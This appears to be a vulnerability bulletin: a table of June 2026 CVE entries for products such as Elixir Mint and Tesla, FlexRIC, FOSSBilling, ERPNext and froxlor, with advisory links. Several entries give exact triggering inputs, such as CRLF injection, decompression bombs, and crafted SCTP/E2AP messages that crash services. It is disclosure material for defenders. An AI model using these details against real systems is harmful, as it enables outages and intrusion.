| Disig--Web Signer | A critical Remote Code Execution (RCE) vulnerability exists in Disig Web Signer versions 2.0.3 through 2.5.3. | 2026-06-01 | not yet calculated | CVE-2026-8931 | https://www.disig.sk/en/news/important-update-of-the-web-signer-application/ https://www.disig.sk/sk/aktuality/dolezita-aktualizacia-aplikacie-web-signer/ https://download.disigcdn.sk/cdn/products/websigner2/changelog.en.txt https://download.disigcdn.sk/cdn/products/websigner2/changelog.sk.txt https://qesportal.sk/Portal/en/Info/News#websigner255 https://qesportal.sk/Portal/sk/Info/News#websigner255 |
| Docker--Docker Desktop | Fixed a VM panic caused by unbounded recursion in the grpcfuse kernel module when a container created deeply nested directories on a bind-mounted host folder and triggered a dentry invalidation event. This issue has been fixed in Docker Desktop 4.76.0. | 2026-06-02 | not yet calculated | CVE-2026-8936 | https://docs.docker.com/desktop/release-notes/#4760 |
| Dovestones Softwares--ADPhonebook | Dovestones Softwares ADPhonebook before v4.0.1.1 is vulnerable to a Cross Site Scripting vulnerability. The /Admin/Save API allows an authenticated admin user to store malicious JavaScript payloads in multiple configuration sections without proper input validation or output encoding. | 2026-06-03 | not yet calculated | CVE-2026-36460 | https://dovestones.com/download/ https://gist.github.com/pentestrox/16d92f8f8114ad3b34805c449f573cef |
| elixir-mint--mint | Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in elixir-mint Mint allows HTTP Request Splitting and HTTP Request Smuggling. In lib/mint/http1/request.ex, the encode_request_line/2 function splices the caller-supplied method and target arguments directly into the HTTP/1 request line without any character validation: [method, ?\s, target, " HTTP/1.1\r\n"]. An application that forwards attacker-controlled input as the HTTP method or target to Mint.HTTP.request/5 is therefore exposed to request-line CRLF injection: the attacker can terminate the request line early, inject arbitrary headers, and smuggle an entirely separate pipelined HTTP request onto the same TCP connection. Mint 1.7.0 introduced validate_request_target/2, which rejects CRLF and other control characters in the target by default and closes the path/query vector unless the caller opts out via skip_target_validation: true. The method field remains unvalidated, so the method-based injection is exploitable under the default Mint configuration on all versions. This issue affects mint: from 0.1.0 before 1.9.0. | 2026-06-02 | not yet calculated | CVE-2026-48861 | https://github.com/elixir-mint/mint/security/advisories/GHSA-2pg6-44cx-c49v https://cna.erlef.org/cves/CVE-2026-48861.html https://osv.dev/vulnerability/EEF-CVE-2026-48861 https://github.com/elixir-mint/mint/commit/fad091454cbb7449b19edb8e1fee12ca7cf28c3a |
| elixir-mint--mint | Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint Mint allows attacker-controlled HTTP/2 servers to exhaust memory in a Mint client via PUSH_PROMISE flooding. In lib/mint/http2.ex, Mint.HTTP2.decode_push_promise_headers_and_add_response/5 inserts a :reserved_remote entry into conn.streams for every promised stream ID. The neighbouring Mint.HTTP2.assert_valid_promised_stream_id/2 only verifies that the promised ID is even and not already present; client_settings.max_concurrent_streams is not consulted at promise time. The concurrency cap is only checked when the response HEADERS for the promised stream arrive, so a server that emits PUSH_PROMISE frames and withholds the matching HEADERS never trips that check. HTTP/2 server push is accepted by default (client_settings.enable_push defaults to true). A single long-lived HTTP/2 connection to a hostile server lets that server pin one conn.streams entry per PUSH_PROMISE frame it sends, with no upper bound, until the client process runs out of memory. This issue affects mint: from 0.2.0 before 1.9.0. | 2026-06-02 | not yet calculated | CVE-2026-48862 | https://github.com/elixir-mint/mint/security/advisories/GHSA-g586-ccqf-7x4r https://cna.erlef.org/cves/CVE-2026-48862.html https://osv.dev/vulnerability/EEF-CVE-2026-48862 https://github.com/elixir-mint/mint/commit/70b97b6a5209fb288b0e04d8e657dda26c59de67 |
| elixir-mint--mint | Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in elixir-mint Mint allows attacker-controlled HTTP/1 servers to desynchronise response framing on shared connections. Mint's HTTP/1 Content-Length parser, Mint.HTTP1.Parse.content_length_header/1 in lib/mint/http1/parse.ex, parses the header value with Integer.parse/1, which accepts an optional + or - sign prefix. The length >= 0 guard rejects negatives, but inputs such as +0 or +123 are returned as valid lengths. RFC 7230 specifies Content-Length = 1*DIGIT, with no sign character permitted. A fronting proxy or load balancer that strictly enforces the grammar will reject or reframe a header like Content-Length: +0, while Mint silently treats it as zero. When Mint reuses the socket (keep-alive, pipelining, or any pooled connection shared across requesters), the parser disagreement is a response-smuggling primitive: the proxy delimits the body one way, Mint another, and bytes from one response get attributed to the next. Where the same Mint connection is shared across trust boundaries, an attacker-controlled upstream can leak bytes into a different consumer's response stream. This issue affects mint: from 0.1.0 before 1.9.0. | 2026-06-02 | not yet calculated | CVE-2026-49753 | https://github.com/elixir-mint/mint/security/advisories/GHSA-mjqx-c6f6-7rc2 https://cna.erlef.org/cves/CVE-2026-49753.html https://osv.dev/vulnerability/EEF-CVE-2026-49753 https://github.com/elixir-mint/mint/commit/47e48027480228e4e32a0b4df39db497b4804921 |
| elixir-mint--mint | Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint Mint allows attacker-controlled HTTP/2 servers to exhaust memory in a Mint client (HTTP/2 CONTINUATION flood). When Mint's HTTP/2 receive path observes a HEADERS frame without the END_HEADERS flag, the unparsed header-block fragment is parked in conn.headers_being_processed, and every subsequent CONTINUATION frame on that stream is appended to the accumulator. Nothing in the receive path caps the accumulator: there is no per-stream size limit, no CONTINUATION frame-count limit, and max_header_list_size is only enforced on outgoing requests, never on inbound header blocks (its default is :infinity). A malicious or compromised HTTP/2 server can stream an endless sequence of CONTINUATION frames (each up to the peer-advertised SETTINGS_MAX_FRAME_SIZE) and drive the client's iolist to arbitrary size, causing memory exhaustion and BEAM process death. A single connection to an attacker-controlled HTTP/2 endpoint is sufficient. This issue affects mint: from 0.1.0 before 1.9.0. | 2026-06-02 | not yet calculated | CVE-2026-49754 | https://github.com/elixir-mint/mint/security/advisories/GHSA-2p26-p43x-fhp8 https://cna.erlef.org/cves/CVE-2026-49754.html https://osv.dev/vulnerability/EEF-CVE-2026-49754 https://github.com/elixir-mint/mint/commit/b662d127d3028b5426c88d4c9cc7fe430491a10b |
| elixir-tesla--tesla | Improper Handling of Highly Compressed Data (Data Amplification) vulnerability in elixir-tesla tesla allows a denial of service via decompression bomb in HTTP response bodies. When Tesla.Middleware.DecompressResponse or Tesla.Middleware.Compression is included in a Tesla middleware pipeline, HTTP response bodies are decompressed eagerly with no size limit. The decompress_body/2 function in lib/tesla/middleware/compression.ex passes the entire response body to :zlib.gunzip/1 or :zlib.unzip/1 without any cap on the output size. Additionally, compression_algorithms/1 splits the content-encoding header on commas and decompress_body/2 recurses once per token, applying a decompression pass on each iteration. A server advertising content-encoding: gzip, gzip, gzip, gzip causes four recursive decompression passes, yielding exponential amplification: each gzip layer can expand its input roughly 1000x, so a payload of a few hundred bytes on the wire inflates to gigabytes of BEAM heap, exhausting memory and crashing or freezing the calling process. This issue affects tesla: from 0.6.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48594 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-mc85-72gr-vm9f https://cna.erlef.org/cves/CVE-2026-48594.html https://osv.dev/vulnerability/EEF-CVE-2026-48594 https://github.com/elixir-tesla/tesla/commit/340f75b5d191dc747ef7ac6365bd002d1cd55a9d |
| elixir-tesla--tesla | Improper Handling of Case Sensitivity vulnerability in elixir-tesla tesla allows credential leakage to a third-party origin on cross-origin redirects. Tesla.Middleware.FollowRedirects strips security-sensitive headers on cross-origin redirects using a case-sensitive string comparison against a lowercase filter list (@filter_headers ["authorization", "host"]). HTTP header names are case-insensitive per RFC 7230, but Tesla preserves header keys verbatim as supplied by the caller without normalizing case. A header set as {"Authorization", "Bearer …"} (the RFC 7235 canonical casing used by virtually all HTTP libraries and documentation) does not match the lowercase filter entry and is forwarded to the redirect destination. An attacker who can control or influence a Location: response seen by the client (via their own endpoint, a redirect-open upstream, or a compromised origin) receives the bearer token or other Authorization material on the cross-origin request. This issue affects tesla: from 1.4.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48595 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-9m9w-gxf7-rh8m https://cna.erlef.org/cves/CVE-2026-48595.html https://osv.dev/vulnerability/EEF-CVE-2026-48595 https://github.com/elixir-tesla/tesla/commit/db963dba67651b9abd1fc420a1d9679cf6efe182 |
| elixir-tesla--tesla | Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') vulnerability in elixir-tesla tesla allows HTTP header injection via Tesla.Multipart.add_content_type_param/2. Tesla.Multipart.add_content_type_param/2 appends caller-supplied strings to the multipart content_type_params list without validating for CR (\r) or LF (\n) characters. Tesla.Multipart.headers/1 then joins these params verbatim with "; " to construct the outgoing Content-Type header value. A param containing \r\n splits the header line, allowing arbitrary headers to be injected into the outbound HTTP request. Any application that forwards untrusted input (such as a user-supplied charset or parameter string) into add_content_type_param/2 is affected. This issue affects tesla: from 0.8.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48596 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-q7jx-v53g-848w https://cna.erlef.org/cves/CVE-2026-48596.html https://osv.dev/vulnerability/EEF-CVE-2026-48596 https://github.com/elixir-tesla/tesla/commit/23601edac5d22ba9407b427967b5bdbda201aec2 |
| elixir-tesla--tesla | Allocation of Resources Without Limits or Throttling vulnerability in elixir-tesla tesla allows denial of service via atom table exhaustion in Tesla.Adapter.Mint. Tesla.Adapter.Mint.open_conn/2 converts the URL scheme of every outgoing request to a BEAM atom via String.to_atom(uri.scheme) with no allow-list validation. BEAM atoms are never garbage-collected and the atom table is bounded (approximately 1,048,576 entries by default). An attacker who can influence the URL of a Tesla request - either via an application-level URL-forwarding feature (webhook, proxy, importer) or via a Location header returned by a server when Tesla.Middleware.FollowRedirects is in the pipeline - can mint one fresh permanent atom per request by varying the scheme string. After enough requests the atom table fills and the VM crashes, taking down the entire application. This issue affects tesla: from 1.3.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48597 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-h74c-q9j7-mpcm https://cna.erlef.org/cves/CVE-2026-48597.html https://osv.dev/vulnerability/EEF-CVE-2026-48597 https://github.com/elixir-tesla/tesla/commit/4699c3cb3e2fd6078f99f45f11cf7466aeedbf0e |
| elixir-tesla--tesla | Improper Encoding or Escaping of Output vulnerability in elixir-tesla tesla allows multipart part header injection via unescaped Content-Disposition parameter values. Tesla.Multipart.part_headers_for_disposition/1 interpolates each disposition parameter as #{k}="#{v}" with no validation of CR (\r), LF (\n), or double-quote characters. The values come verbatim from the caller via Tesla.Multipart.add_field/4 (the name parameter), Tesla.Multipart.add_file/3, and Tesla.Multipart.add_file_content/4 (both the filename parameter and other disposition opts). A " in the value closes the quoted parameter early; a \r\n ends the Content-Disposition header line and starts a new part header (such as a forged Content-Type), or, after a second \r\n, ends the entire part header block and prepends bytes to the part body. The default-filename path in add_file/3 derives the filename via Path.basename/1, which does not strip CR or LF, so any application forwarding a partially-attacker-controlled file path inherits the same issue. This issue affects tesla: from 0.8.0 before 1.18.3. | 2026-06-02 | not yet calculated | CVE-2026-48598 | https://github.com/elixir-tesla/tesla/security/advisories/GHSA-28jh-g32x-v9v4 https://cna.erlef.org/cves/CVE-2026-48598.html https://osv.dev/vulnerability/EEF-CVE-2026-48598 https://github.com/elixir-tesla/tesla/commit/bb1a2c3da2775924d96e3db8e315dcc4d5d2246e |
| Ericsson--Packet Core Gateway (PCG) | Ericsson Packet Core Gateway (PCG) versions prior to 1.30 contain an Improper Handling of Syntactically Invalid Structure (CWE-228) vulnerability where an attacker continuously sending a specially crafted message can cause service degradation. The impact continues as long as the attack persists, but the system recovers from the crashes when the attack stops. | 2026-06-05 | not yet calculated | CVE-2026-25657 | https://www.ericsson.com/en/about-us/security/psirt/cve-2026-25657 |
| Ericsson--Packet Core Gateway (PCG) | Ericsson Packet Core Gateway (PCG) versions prior to 1.30 contain an Improper Handling of Missing Values (CWE-230) vulnerability where an attacker continuously sending a specially crafted message can cause service degradation. The impact continues as long as the attack persists, but the system recovers from the crashes when the attack stops. | 2026-06-05 | not yet calculated | CVE-2026-25658 | https://www.ericsson.com/en/about-us/security/psirt/cve-2026-25658 |
| Ericsson--Packet Core Gateway (PCG) | Ericsson Packet Core Gateway (PCG) versions prior to 1.30 contain an Improper Handling of Missing Values (CWE-230) vulnerability where an attacker continuously sending a specially crafted message can cause service degradation. The impact continues as long as the attack persists, but the system recovers from the crashes when the attack stops. | 2026-06-05 | not yet calculated | CVE-2026-25659 | https://www.ericsson.com/en/about-us/security/psirt/cve-2026-25659 |
| ESA--AnomalyMatch | An issue in ESA AnomalyMatch before 1.3.1 allows attackers to execute arbitrary code via crafted model checkpoint files. The affected components load model files from session directories using torch.load() with unrestricted deserialization. | 2026-06-01 | not yet calculated | CVE-2026-38950 | https://github.com/esa/AnomalyMatch/pull/9 https://imlabs.info/research/security_advisory_esa_anomaly_match_unsafe_deserialization_cve_2026_38950_ivan_markovic_052026.html https://github.com/Accenture/AARO-Bugs/blob/master/AARO-CVE-List.md |
| Etoile Web Design Incorporated--Five Star Restaurant Reservations | Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Five Star Restaurant Reservations: from n/a through 2.7.14. | 2026-06-02 | not yet calculated | CVE-2026-42670 | https://patchstack.com/database/wordpress/plugin/restaurant-reservations/vulnerability/wordpress-five-star-restaurant-reservations-plugin-2-7-14-payment-bypass-vulnerability?_s_id=cve |
| FastNetMon--FastNetMon | FastNetMon Community Edition through 1.2.9 contains an out-of-bounds read in the IPv4 packet parser. In src/simple_packet_parser_ng.cpp, after validating that the packet contains at least sizeof(ipv4_header_t) bytes (20 bytes), the code advances the local_pointer by '4 * ipv4_header->get_ihl()' (line 164) without validating that (a) IHL >= 5 (the minimum valid value per RFC 791), or (b) 4 * IHL bytes are actually available in the packet. The IHL field is 4 bits, allowing values 0-15, so the advance can be 0-60 bytes. An IHL value of 15 with only 20 bytes validated causes a 40-byte over-read. An IHL of 0-4 causes the pointer to not advance past the IP header, resulting in the TCP/UDP header being parsed from IP header data (type confusion). This vulnerability is reachable via any packet capture interface. | 2026-06-02 | not yet calculated | CVE-2026-48682 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/simple_packet_parser_ng.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48682-ipv4-parser-oob |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when an SCTP association is closed before an E2_SETUP_REQUEST is sent. The near-RT RIC assumes a mapping between SCTP association and E2 node always exists in the cleanup path and enforces this via assert(). A remote unauthenticated attacker can crash the near-RT RIC (port 36421) by simply completing an SCTP handshake and immediately disconnecting, without sending any E2AP message. | 2026-06-01 | not yet calculated | CVE-2026-37220 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37220.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when receiving a RIC_SUBSCRIPTION_RESPONSE with an unknown ric_id that has no corresponding pending event. The near-RT RIC uses assert() to enforce the existence of a pending event during response processing. A remote unauthenticated attacker can send a forged RIC_SUBSCRIPTION_RESPONSE to the near-RT RIC (port 36421) to cause SIGABRT in Debug builds or NULL pointer dereference (SIGSEGV) in Release builds. | 2026-06-01 | not yet calculated | CVE-2026-37221 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37221.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 uses hardcoded assertions to validate Information Element (IE) counts in decoded E2AP messages. A remote unauthenticated attacker can send a valid E2AP PDU containing an unexpected number of IEs (e.g., an E2setupRequest with extra optional fields) to crash the near-RT RIC (port 36421) or iApp (port 36422) via SIGABRT. The code asserts exact IE counts rather than validating against protocol-specified ranges. | 2026-06-01 | not yet calculated | CVE-2026-37222 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37222.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains a reachable assertion in the iApp message dispatcher. The dispatcher validates incoming E2AP messages against a 9-entry whitelist using assert(). A remote unauthenticated attacker can send any decodable E2AP PDU with a message type not in the whitelist to crash the iApp process (port 36422) via SIGABRT. Since iApp and the near-RT RIC share one process, this terminates the entire RIC service and disconnects all E2 Nodes and xApps. | 2026-06-01 | not yet calculated | CVE-2026-37223 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37223.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when receiving a duplicate E2_SETUP_REQUEST from the same or spoofed E2 Node. The iApp registry enforces node ID uniqueness via assert() rather than graceful rejection. A remote unauthenticated attacker can crash the iApp process (port 36421) by sending two E2_SETUP_REQUESTs with the same E2 node configuration, triggering SIGABRT. | 2026-06-01 | not yet calculated | CVE-2026-37224 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37224.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when the iApp receives an E42_RIC_SUBSCRIPTION_REQUEST with an empty ricEventTriggerDefinition field. The E42 layer decoder accepts this as valid, but the E2AP encoder asserts a non-empty constraint when forwarding the request. A remote unauthenticated attacker can crash the iApp process (port 36422) via SIGABRT by exploiting this cross-layer validation mismatch. | 2026-06-01 | not yet calculated | CVE-2026-37225 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37225.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when the iApp receives an E42_RIC_SUBSCRIPTION_REQUEST referencing a non-existent E2 Node. The lookup function returns NULL, which is enforced by assert() in Debug builds (SIGABRT) and dereferenced in Release builds (SIGSEGV). A remote unauthenticated attacker can crash the iApp process (port 36422) by sending a subscription request with an arbitrary global_e2_node_id. | 2026-06-01 | not yet calculated | CVE-2026-37226 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37226.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains reachable assert(0) calls in stub message handlers for whitelisted but unimplemented E2AP message types in the near-RT RIC. A remote unauthenticated attacker can send a decodable E2AP PDU of such a type (e.g., E2nodeConfigurationUpdate) to crash the near-RT RIC process (port 36421) via SIGABRT. The message passes whitelist validation but triggers an unconditional assertion in the handler. | 2026-06-01 | not yet calculated | CVE-2026-37227 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37227.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains a reachable assertion in e2ap_recv_sctp_msg() (src/lib/ep/e2ap_ep.c). The function allocates a fixed 32KB receive buffer and enforces assert(rc < len) on the sctp_recvmsg() return value. A remote unauthenticated attacker can send a single SCTP message with payload >= 32,768 bytes to crash the near-RT RIC, iApp, E2 Agent, or xApp process via SIGABRT. No valid E2AP PDU is required. All four SCTP endpoint types (ports 36421 and 36422) share this vulnerable code path. In Release builds (NDEBUG), the stripped assertion leads to a signed-to-unsigned integer overflow and potential out-of-bounds read. | 2026-06-01 | not yet calculated | CVE-2026-37228 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37228.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains a reachable assertion in e2ap_create_pdu() triggered when ASN.1 PER decoding fails. A remote unauthenticated attacker can send any non-PER byte sequence (e.g., a single 0x00 byte) over SCTP to the near-RT RIC (port 36421) or iApp (port 36422) to crash the process via SIGABRT. The assertion is reached before any protocol-level validation occurs. All three E2AP protocol versions (v1.01, v2.03, v3.01) are affected. | 2026-06-01 | not yet calculated | CVE-2026-37229 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37229.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 crashes when the near-RT RIC receives a RIC_INDICATION message with a ran_func_id that does not exist in its registry. The lookup returns NULL, triggering assert() in Debug builds (SIGABRT) or NULL pointer dereference in Release builds (SIGSEGV). A remote unauthenticated attacker can crash the near-RT RIC (port 36421) by sending a crafted RIC_INDICATION with an arbitrary ran_func_id value. | 2026-06-01 | not yet calculated | CVE-2026-37230 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37230.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 uses a uint16_t counter for xapp_id assignment but stores the value in uint32_t message fields. After 65,530+ E42_SETUP_REQUESTs, the 16-bit counter wraps around and produces duplicate xapp_ids. The iApp (port 36422) crashes when attempting to register a duplicate ID in its internal data structure. A remote attacker can trigger this by repeatedly connecting and requesting new xApp registrations. | 2026-06-01 | not yet calculated | CVE-2026-37231 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37231.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 contains an authorization bypass in the iApp's xApp isolation mechanism. The equality function eq_xapp_ric_gen_id() in src/ric/iApp/xapp_ric_id.c compares m0->xapp_id against itself (m0->xapp_id) instead of the other argument (m1->xapp_id), effectively ignoring the xApp identity dimension. A malicious xApp connected to the iApp (port 36422) can delete any other xApp's subscriptions by sending an E42_RIC_SUBSCRIPTION_DELETE_REQUEST with a matching ric_gen_id. This breaks multi-tenant isolation in any deployment with multiple xApps sharing the same RIC. | 2026-06-01 | not yet calculated | CVE-2026-37233 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37233.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 allows a single SCTP connection to bind multiple xapp_ids by sending multiple E42_SETUP_REQUESTs. On disconnect, only the first registered xapp_id's resources are cleaned up; subsequent xapp_ids and their subscriptions remain as stale entries. A remote attacker can exploit this to leak subscription state in the iApp, potentially causing resource exhaustion or state corruption over time. | 2026-06-01 | not yet calculated | CVE-2026-37234 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37234.md |
| FlexRIC--FlexRIC v2.0.0 | FlexRIC v2.0.0 trusts the xapp_id field from E42 message payloads without binding it to the sender's SCTP association. The validation function valid_xapp_id() only checks that the value is within the assigned range. A remote unauthenticated attacker can impersonate any xApp by specifying their xapp_id in requests sent to the iApp (port 36422), causing responses to be misrouted to the victim xApp. This can crash the victim xApp, the RIC, or the iApp itself through state inconsistencies in the red-black tree data structure. | 2026-06-01 | not yet calculated | CVE-2026-37235 | https://gitlab.eurecom.fr/mosaic5g/flexric https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37235.md |
| Forcepoint--VPN Client | A local privilege escalation vulnerability exists in Forcepoint VPN Client that allows a local non-administrative user to escalate privileges to SYSTEM. This issue affects VPN Client for Windows: versions 6.11.3 and prior. | 2026-06-04 | not yet calculated | CVE-2025-12694 | https://support.forcepoint.com/s/article/Security-Advisory-Local-Privilege-Escalation-in-VPN-Client-for-Windows |
| FOSSBilling--FOSSBilling | FOSSBilling is a free, open-source billing and client management system. Versions prior to 0.8.0 leak the exact system version through asset cache buster parameters in HTML output, bypassing the `hide_version_public` security setting. The FOSSBilling version is embedded in the query string of every `<script>` and `<link>` tag generated by the `script_tag` and `stylesheet_tag` Twig filters. This information is visible to all visitors - including unauthenticated guests - on every page, regardless of whether the `hide_version_public` setting is enabled. The `X-FOSSBilling-Version` HTTP header and the `guest.system.version` API endpoint correctly honour the `hide_version_public` setting, but the asset cache buster parameters were overlooked. Knowledge of the exact FOSSBilling version makes it significantly easier for malicious actors to identify known vulnerabilities applicable to a given installation and craft targeted exploits. While not a direct vulnerability on its own, it undermines the intended protection offered by the `hide_version_public` setting and facilitates reconnaissance. Version 0.8.0 contains a patch. There is no practical workaround that removes the version from asset URLs without modifying source code. | 2026-06-03 | not yet calculated | CVE-2026-40495 | https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-gqcp-g7rm-p5v6 https://github.com/FOSSBilling/FOSSBilling/releases/tag/0.8.0 |
| FOSSBilling--FOSSBilling | FOSSBilling is a free, open-source billing and client management system. Prior to version 0.8.0, the Redirect module does not validate the URL scheme of administrator-configured destination URLs before storing or issuing redirects. This allows arbitrary external URLs to be configured as redirect targets, creating an open redirect vulnerability exploitable for phishing attacks. Users following a legitimate FOSSBilling URL can be silently redirected to an attacker-controlled external site. The redirect is issued as a 301 (Moved Permanently) response, which browsers cache persistently, amplifying the impact. Exploitation requires administrator privileges to create or modify redirect entries, limiting practical attack scenarios to multi-admin environments or compromised admin accounts. Version 0.8.0 fixes the issue. Some workarounds are available. Restrict admin access to the Redirect module to trusted administrators only and/or audit existing redirect entries in the database (the `extension_meta` table with `extension = 'mod_redirect'`) for any unexpected or external target URLs. | 2026-06-03 | not yet calculated | CVE-2026-43924 | https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-v8rf-g37v-vgpx https://github.com/FOSSBilling/FOSSBilling/releases/tag/0.8.0 |
| FOSSBilling--FOSSBilling | FOSSBilling is a free, open-source billing and client management system. Prior to version 0.8.0, the password reset confirmation endpoint `/client/reset-password-confirm/:hash` is handled by a non-API controller and is not covered by FOSSBilling's rate limiter, which only applies to `/api/*` routes. This allows an attacker to probe the endpoint for valid reset tokens without any per-IP request limiting, attempt counting, or lockout mechanism. The endpoint acts as an oracle, returning a distinguishable response for valid versus invalid tokens (HTTP 200 vs HTTP 302 redirect). An attacker can submit unlimited token guesses to the password reset confirmation endpoint with no throttling applied. However, practical exploitability is significantly mitigated by the current token generation, which uses `hash('sha256', random_bytes(32))`, providing 256 bits of entropy. Tokens also expire after 15 minutes and are deleted after successful use. The same architectural gap applies to other controller-served auth routes, including `/staff/email/:hash` (admin password reset confirmation) and `/client/confirm-email/:hash` (email confirmation). Version 0.8.0 fixes the issue. Some workarounds are available. Configure a reverse proxy (e.g., Nginx, Apache, Cloudflare) to apply per-IP rate limiting to the `/client/reset-password-confirm/*` and `/staff/email/*` paths and/or use a WAF rule to limit request rates to these endpoints. | 2026-06-04 | not yet calculated | CVE-2026-43926 | https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-cqqm-p3x5-9fqg https://github.com/FOSSBilling/FOSSBilling/releases/tag/0.8.0 |
| Frappe--ERPNext | An authenticated ERPNext user with Item record edit permissions can persist arbitrary HTML/JavaScript in the item_name, description, or image fields of an Item and trigger unescaped rendering in the Point of Sale (POS) cart interface for every operator who adds that item to a transaction. This issue affects ERPNext: 16.16.0. | 2026-06-03 | not yet calculated | CVE-2026-42839 | https://fluidattacks.com/es/advisories/pink https://github.com/frappe/erpnext |
| Frappe--ERPNext | An authenticated user can persist arbitrary HTML/JavaScript in the email_id or mobile_no fields of a Customer record and trigger unescaped rendering in the Point of Sale (POS) interface for every operator who selects that customer. This issue affects ERPNext: 16.16.0. | 2026-06-03 | not yet calculated | CVE-2026-42840 | https://fluidattacks.com/es/advisories/weeknd https://github.com/frappe/erpnext |
| froxlor--froxlor | Froxlor is open source server administration software. Version 2.3.6 lets administrators configure `system.available_shells` as the approved shell list that customers may assign to FTP users. However, the server-side FTP account handlers do not enforce that whitelist when processing add or edit requests. As a result, an authenticated customer with shell delegation enabled can submit an arbitrary shell such as `/bin/bash` even when the panel UI only offers more restricted choices. In deployments that use the default `nssextrausers` integration, the attacker-controlled shell is then propagated into the system account database, leading to real host shell access. Version 2.3.7 fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-41235 | https://github.com/froxlor/froxlor/security/advisories/GHSA-gcv3-5v9q-fmhh https://github.com/froxlor/froxlor/releases/tag/2.3.7 |
| froxlor--froxlor | Froxlor is open source server administration software. In version 2.3.6 and earlier, the LOC record regex uses `\s+` which matches newlines (allowing embedded newlines to pass), TLSA `matchingType=0` has no upper bound on hex data length, and all validators return raw input without zone-file escaping. Version 2.3.7 contains an updated patch. | 2026-06-04 | not yet calculated | CVE-2026-41237 | https://github.com/froxlor/froxlor/security/advisories/GHSA-j6fm-9rfm-j5hx https://github.com/froxlor/froxlor/commit/b34829262dc3 https://github.com/froxlor/froxlor/releases/tag/2.3.7 |
| FRRouting--FRRouting | Missing input validation in the rfapiRibBi2Ri() function (rfapi_rib.c) of FRRouting (FRR) stable/10.0 to stable/10.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message. | 2026-06-03 | not yet calculated | CVE-2026-37460 | https://github.com/FRRouting/frr/pull/21098 https://github.com/FRRouting/frr https://github.com/FRRouting/frr/commit/7676cad65114aa23adde58 |
